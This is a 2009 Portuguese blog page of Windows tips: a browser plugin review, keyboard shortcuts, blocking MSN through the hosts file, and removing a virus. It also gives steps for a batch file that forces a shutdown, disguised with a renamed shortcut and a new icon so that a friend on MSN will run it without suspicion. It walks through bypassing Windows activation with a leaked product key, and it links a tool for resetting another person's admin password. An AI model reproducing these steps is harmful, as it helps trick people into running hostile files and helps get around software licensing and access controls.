domingo, 11 de janeiro de 2009

Aprimorar sua navegação.

PIC LENS - Aprimorador de Navegação

O PicLens da Cooliris (http://www.cooliris.com/) é um plugin gratuito disponível para os navegadores Firefox, Internet Explorer e Safari. A extensão coloca o usuário em uma galeria 3D de vídeos e fotos dependendo da fonte utilizada.

Compatível com YouTube, facebook, flickr, myspace, photobucket, Picasa, Google Images . Ele funciona como uma galeria tridimensional onde é possível percorrer pelas miniaturas das imagens e vídeos, clicá-las para ver mais detalhes e, é claro, navegar em modo de tela-cheia em slide show.

A instalação é muito rápida e fácil. Depois de instalado basta acessar um dos sites compatíveis com o produto e clicar na seta sobre uma imagem ou vídeo disponível, no mesmo instante uma enorme galeria com todos os vídeos e imagens disponíveis na pagina será aberta e você poderá navegar facilmente pelo site acessado. Abaixo segue uma foto de como o produto se apresenta ao usuário, muito fácil e intuitivo dispensa mais comentários sobre seu uso.

PicLens

Atalhos Do Windows

Os atalhos do Windows XP:

Alt + Enter =
Exibe as propiedades do arquivo.
Alt + Esc = Alterna entre janelas na ordem em que foram abertas.
Alt + F4 = Fecha progama.
Alt + Tab = Alterna entre janelas de programas abertos.
Alt + Espaço + N ou X = Minimiza ou Maximiza janela.
Ctrl + Esc = Abre o "Menu Iniciar".
Ctrl + F4 = Fecha janela de um programa.
Ctrl + Z = Desfaz última ação.
Ctrl + "+" = Dá zoom positivo.
Ctrl + "-" =
Dá zoom negativo.
F1 = Abre a janela de ajuda.
F2 = Renomeia o item selecionado.
F3 = Realiza pesquisa.
Print Screen = Captura tela para colar em programas como paint.
Alt + Print Screen = Captura somente a janela ativa.
Shift + Del = Exclui um item sem armazená-lo na lixeira.
Shift + F10 = Equivale ao clique do botão direito do mouse.
Shift + Tab = Retrocede entre itens de um documento.
Tab = Avança entre itens de um documento.
Windows + D = Minimiza e Restaura todas as janelas.
Windows =
Abre o "Menu Iniciar".
Windows +
E = Abre o Windows Explorer.
Windows + F = Abre o Pesquisador de Arquivos.
Windows + R
= Abre a janela "Executar".
Windows + L = Faz o Longoff.
Windows + U = Abre o Gerenciador de Ultilitarios.
Windows + F1 = Abre o Centro de Ajuda e Suporte.
Windows + Pause Break = Mostra as Propriedades do Sistema.

Como desligar PC pelo bloco de notas

Para desligar o pc pelo bloco de notas siga estas instruçoes:

1- Abra o bloco de notas

2- Digite: shutdown -r -c "qualquer mensagem" -t 15
OBS: o tempo "(-t)" pode ser escolhido do mesmo modo que a mensagem
3-Salve o arquivo em qualquer lugar e com qualquer nome contanto que no final do nome esteja escrito ".bat".
Ex:
teste.bat
4- O aquivo está pronto mas para mandar para o seu amigo pelo MSN voce tem que criar um atalho deste arquivo.
5- Ápos criar o atalho do arquivo Renomeie o atalho e mude o íncone para que ele não pareça suspeito.
6- O arquivo que desliga o pc está pronto.

OBS: Para cancelar o desligamento do PC´, vá em executar e digite ´´shutdown -a`` enquanto o desligamento é processado

Quebrar Senha Do Administrador

Pra quem perdeu a senha ou tem um irmão que fica pondo senha como admin ai vai um site em que você aprende a rezetar a senha:

http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html

É nescessario entender ingles senao fica dificil a compreensão.

Como Bloquear o MSN

Para bloquear o msn:

1- Clique em "iniciar" e depois "executar".
2- Digite "c:/windows/system32/drivers/etc/hosts" (Neste momento escolha abrir com o bloco de notas).
3- Ao abrir o bloco de notas copie na ultima linha abaixo de "127.0.0.1 localhost"
O seguinte texto:
127.0.0.1 gtwy.messenger.hotmail.com
127.0.0.1 gateway.messenger.hotmail.com
127.0.0.1 messenger.hotmail.com
127.0.0.1 svcs.microsoft.com

Pronto agora o computador não ira mais efetuar o Login do MSN.
É importante notar que esse proscesso só ira travar o MSN do computador em que este processo foi feito não funciona em rede

Validar Windows Media Player 11

Para validar o Windows Media Player 11 siga os seguintes passos:

1-Vá em ´´Iniciar`` > ´´Executar``

2-Digite regedit e clique em OK.
2.5- Siga a seguinte indicação: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Cu rrentVersion\WPAEvents
3-No painel à direita, clique duas vezes em ´´OOBETimer``
5-Na janela que foi aberta, apague qualquer valor e clique em OK. Feche o regedit
OBS: Se você não conseguir apagar o valor "0000" não tem problema.
6-Vá novamente em ´´Iniciar`` > ´´Executar`` e dessa vez digite:
%systemroot%\system32\oobe\msoobe.exe /a
7-Na janela que foi aberta, escolha a opção Sim, desejo telefonar...
8-Na próxima etapa, clique no botão Alterar chave de produto.
9-Na etapa seguinte, digite a CD-Key:
THMPV-77D6F-94376-8HGKG-VRDRQ
e clique no botão Atualizar
10-Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.
11-Reiniciado o Windows vá novamente em ´´Iniciar`` > ´´Executar`` e digite:
%systemroot%\system32\oobe\msoobe.exe /a
12-Aparecerá a seguinte mensagem:
Ativação do Windows
O Windows já está ativado. Clique em OK para sair.

WINDOWS JÁ ESTARA ORIGINAL !

Deletar Virús Muahaha

Este Virús bloqueia o Orkut e o Youtube. Seguido da mensagem ´´Orkut is banned you fool, The administrators didnt write this program guess who did?? MUHAHAHA!!`` ele também destroi CABOS USB, CARTÕES DE MEMORIA...
Para deletar o virús:
1- Abra o Gerenciador de Tarefas(Ctrl + Alt + Delete)
2- Vá ate a aba de processos
3- Procure por svchost.exe cujo o nome de usuário é o atual logado e finalize o processo
3,5- CUIDADO! para não finalizar o processo errado, pois este processo pode pertencer também ao LOCAL SERVICE, NETWORK SERVICE, SYSTEM entre outros. Certifique-se de estar finalizando o processo pertencente ao seu usuário logado, ele pode retornar então certifique-se de ter finalizado todos os processos svchost.exe pertencentes ao seu usuário.
4- Vá até o "iniciar", "executar" e digite "cmd"

5- Digite "rmdir C:\heap41a".
5,5- Feche o prompt de comandos do DOS

6- Vá até o "iniciar", "executar" e digite "regedit".
7- Vá em "editar" e "localizar"

8- Digite heap41a e mande pesquisar, deve ser retornada uma entrada semelhante a:
C:\heap(algun numero)\std.txt

PRONTO O VIRUS ESTA DELETADO. OBS: ESTE VIRÚS SÓ AFETA O IE(Internet Explorer)

Instale o Firefox, navegue muito mais rápido, tenha menos problemas, veja os sites da maneira certa e EVITE este tipo de problema. O Firefox É DE GRAÇA. Tudo que você tem a fazer é clicar, baixar e testar. Se gostar, faça como todo mundo que entende de computador. Use um navegador melhor.